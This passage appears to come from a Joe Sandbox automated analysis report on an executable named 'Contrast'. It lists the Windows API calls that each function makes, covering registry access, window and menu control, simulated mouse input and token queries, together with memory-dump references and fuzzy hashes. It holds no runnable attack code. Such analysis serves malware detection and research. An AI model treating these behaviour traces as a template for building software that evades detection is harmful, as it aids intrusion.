                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0053A11D
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0053A130
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0053A143
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0053A156
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0053A169
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0053A17C
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0053A18F
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0053A1A2
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0053A1B5
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0053A1C8
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0053A1DB
                                                                                                                                          • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0053A1EE
                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00539D1B
                                                                                                                                        • __mtterm.LIBCMT ref: 00539D24
                                                                                                                                          • Part of subcall function 00539D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539D29,00537EFD,005CCD38,00000014), ref: 00539E86
                                                                                                                                          • Part of subcall function 00539D8C: _free.LIBCMT ref: 00539E8D
                                                                                                                                          • Part of subcall function 00539D8C: DeleteCriticalSection.KERNEL32(0R],?,?,00539D29,00537EFD,005CCD38,00000014), ref: 00539EAF
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00539D49
                                                                                                                                        • __initptd.LIBCMT ref: 00539D6B
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00539D72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                        • Opcode ID: 1f126aac59e3586c25ec3f32bad296a6f145b80f60611afda376c6fbcd418165
                                                                                                                                        • Instruction ID: 961f38770dd5dd93d6f075d85877398e1bebd7ec76d91d90b3680ceee43ada6d
                                                                                                                                        • Opcode Fuzzy Hash: 1f126aac59e3586c25ec3f32bad296a6f145b80f60611afda376c6fbcd418165
                                                                                                                                        • Instruction Fuzzy Hash: 4CF090B251A7135AE7357B747C0B68A6FD4FF81730F204B1AF494D60D3EF9088014190
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00534282,?), ref: 005341D3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005341DA
                                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 005341E6
                                                                                                                                        • DecodePointer.KERNEL32(00000001,00534282,?), ref: 00534203
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-340411864
                                                                                                                                        • Opcode ID: 8daa7a80d6e1b0ba385b8c9c4815564804edb6af81c1aec2689230d2dd3c313c
                                                                                                                                        • Instruction ID: 561221cff5acd18a28c4752fd4bc153de319da74ef43ceb9182f8a2fcdede493
                                                                                                                                        • Opcode Fuzzy Hash: 8daa7a80d6e1b0ba385b8c9c4815564804edb6af81c1aec2689230d2dd3c313c
                                                                                                                                        • Instruction Fuzzy Hash: 47E0E5746A1B01AFDB601BB0EC4DB593B64BB22B0AF609827B481D51E0EBB55088EE00
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005341A8), ref: 005342A8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005342AF
                                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 005342BA
                                                                                                                                        • DecodePointer.KERNEL32(005341A8), ref: 005342D5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                        • API String ID: 3489934621-2819208100
                                                                                                                                        • Opcode ID: 3e0579bac13b1470174ecc57325a6e8ce9232b039a71dcaca299cfe2534c7f01
                                                                                                                                        • Instruction ID: 3396b3702e53804fd60166e69575893552bd0d1de3e0549c6cd5403529094a81
                                                                                                                                        • Opcode Fuzzy Hash: 3e0579bac13b1470174ecc57325a6e8ce9232b039a71dcaca299cfe2534c7f01
                                                                                                                                        • Instruction Fuzzy Hash: BCE0B674562711EFDB609FA0ED0DB453F64BB22B46F505527F041E50E0EBB4550CEA10
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 005121B8
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005121F9
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00512221
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00512350
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00512369
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                        • Opcode ID: 0fd93d7714a226e611edb7b112aebaf34e5ba781397c5cfa45ffcd9e6870c689
                                                                                                                                        • Instruction ID: dd3b379e199b7620f0150ecf03d2e18782c338c91c6d8ee6c71c79668d650b72
                                                                                                                                        • Opcode Fuzzy Hash: 0fd93d7714a226e611edb7b112aebaf34e5ba781397c5cfa45ffcd9e6870c689
                                                                                                                                        • Instruction Fuzzy Hash: BBB19139900249DBEF10CFA8C4807EDBBB1FF48314F149529ED69EB255DB34AAA0DB54
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                        • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                        • Instruction ID: 9c9b6ab5bbdf1a3174de98157e13ed43c35168480921802d90b5517401e396c6
                                                                                                                                        • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                        • Instruction Fuzzy Hash: 9F61AE30500A9BABDF15EF60D889EFE3BA8BF85304F048559F8595B292DB309D45DB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059091D
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059095D
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590980
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005909A9
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005909EC
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 005909F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                        • Opcode ID: 0009d26dfd99588da360e3f583ae02c46a47943077daf6815f7c12c6b677eb8e
                                                                                                                                        • Instruction ID: f90d150414e23acfe3e3f776d7d172d346b3ad494f5e527b9f604c7f67271c3d
                                                                                                                                        • Opcode Fuzzy Hash: 0009d26dfd99588da360e3f583ae02c46a47943077daf6815f7c12c6b677eb8e
                                                                                                                                        • Instruction Fuzzy Hash: 2A515A311082059FDB14EF64C889E6BBFE9FF89314F04491DF595872A2DB31E945CB92
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 00595E38
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00595E6F
                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00595E97
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00595F06
                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00595F14
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595F65
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                        • Opcode ID: 8c5585791109cfe99bb324a4208f8754dc46d0fcf769a6faca8206a4aeea6562
                                                                                                                                        • Instruction ID: 1cac44abcf6a8269cd6cf941ee3e1ebcfda21c3df2afe22a955ecedc0bb16c1f
                                                                                                                                        • Opcode Fuzzy Hash: 8c5585791109cfe99bb324a4208f8754dc46d0fcf769a6faca8206a4aeea6562
                                                                                                                                        • Instruction Fuzzy Hash: BA51A175A01616AFCF12EF64C8459AEBBB5FF48320F104499F905BB391DB30AE418F90
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0056F6A2
                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 0056F714
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0056F76F
                                                                                                                                        • _memmove.LIBCMT ref: 0056F799
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056F7E6
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F814
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                        • Opcode ID: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                                                                                                                                        • Instruction ID: cbbfb5300db800de1d4b7a261ad9673e6c4bcf5efe709d763863248e57776a46
                                                                                                                                        • Opcode Fuzzy Hash: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                                                                                                                                        • Instruction Fuzzy Hash: 85516BB5A00209EFCB14CF58D884AAABBB8FF4C314B15856AED59DB340D730E951CFA0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005729FF
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572A4A
                                                                                                                                        • IsMenu.USER32(00000000), ref: 00572A6A
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00572A9E
                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00572AFC
                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572B2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                        • Opcode ID: e6ff64637f8a6e8f690530fd02a2915cade09299512e1803e4e4eb621676af40
                                                                                                                                        • Instruction ID: 7e6c2438efbb79763e80fdb39920615697b13d05742311dad4f0b4384a972f54
                                                                                                                                        • Opcode Fuzzy Hash: e6ff64637f8a6e8f690530fd02a2915cade09299512e1803e4e4eb621676af40
                                                                                                                                        • Instruction Fuzzy Hash: FB51BE70A0020ADFCF25CF68E888AAEBFF4BF55314F148559E81D9B2A1D7B09944EB51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00511B76
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00511BDA
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00511BF7
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00511C08
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00511C52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                        • Opcode ID: aba62ecc3e5dd5e75f4f6766b208877f6d8459a3a134c1d3a1cefbed7b2630fd
                                                                                                                                        • Instruction ID: d11fefbc0eab7ff70dc0f5a1c9829278d9caedef690dae75309b8b1048539133
                                                                                                                                        • Opcode Fuzzy Hash: aba62ecc3e5dd5e75f4f6766b208877f6d8459a3a134c1d3a1cefbed7b2630fd
                                                                                                                                        • Instruction Fuzzy Hash: 814195301046059FE720DF24CC88FEA7FE8FB59364F1405AAF695872A1D7309C49EB65
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(005D77B0,00000000,00FE5C40,?,?,005D77B0,?,0059BC1A,?,?), ref: 0059BD84
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 0059BDA8
                                                                                                                                        • ShowWindow.USER32(005D77B0,00000000,00FE5C40,?,?,005D77B0,?,0059BC1A,?,?), ref: 0059BE08
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,0059BC1A,?,?), ref: 0059BE1A
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 0059BE3E
                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059BE61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        • Opcode ID: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                                                                                                                                        • Instruction ID: 7f2cb787391fc6c1d2ef49586dd384013740fdc01570c79bc1b783bdbc73a112
                                                                                                                                        • Opcode Fuzzy Hash: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                                                                                                                                        • Instruction Fuzzy Hash: 5A415B74600244AFFF22CF68D689B947FF5FF06714F1841A9EA488F2A2C731A845CB91
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,0058550C,?,?,00000000,00000001), ref: 00587796
                                                                                                                                          • Part of subcall function 0058406C: GetWindowRect.USER32(?,?), ref: 0058407F
                                                                                                                                        • GetDesktopWindow.USER32 ref: 005877C0
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 005877C7
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005877F9
                                                                                                                                          • Part of subcall function 005757FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575877
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00587825
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587883
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4137160315-0
                                                                                                                                        • Opcode ID: 8e839806843a77197f916f7192c02c371d51f09edd281900f3b15077eb774f82
                                                                                                                                        • Instruction ID: 824d27d9a374dfb618b8a96562a396e234042a9f02475456006d2cbdd2bcf1ea
                                                                                                                                        • Opcode Fuzzy Hash: 8e839806843a77197f916f7192c02c371d51f09edd281900f3b15077eb774f82
                                                                                                                                        • Instruction Fuzzy Hash: A931D672508305ABD710EF14D849F5B7B99FFC9354F100919F989A7181DB70E909CF92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568CDE
                                                                                                                                          • Part of subcall function 00568CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568CE8
                                                                                                                                          • Part of subcall function 00568CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568CF7
                                                                                                                                          • Part of subcall function 00568CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568CFE
                                                                                                                                          • Part of subcall function 00568CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568D14
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,0056904D), ref: 00569482
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0056948E
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00569495
                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 005694AE
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0056904D), ref: 005694C2
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005694C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                        • Opcode ID: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                                                                                                                                        • Instruction ID: 17690acdf573be3505ea6793e6ac8184bbed9dfbb8db6a5da39ae4b17ccf9be8
